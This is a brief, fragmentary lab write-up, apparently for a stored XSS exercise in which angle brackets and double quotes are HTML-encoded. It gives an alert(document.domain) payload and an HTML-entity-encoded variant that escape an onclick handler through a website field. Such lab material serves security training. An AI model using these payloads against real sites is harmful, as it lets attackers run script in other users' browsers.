🥌Laboratorio: Stored XSS into onclick event with angle brackets and double quotes HTML-encoded
And single quotes and backslash escaped.
















Last updated
And single quotes and backslash escaped.
















Last updated
'-alert(document.domain)-'
DECODE: '-alert(document.domain)-'&website=https://PAYLOAD-HERE.com
&website=https://%26%61%70%6f%73%3b%2d%61%6c%65%72%74%28%31%29%2d%26%61%70%6f%73%3b.com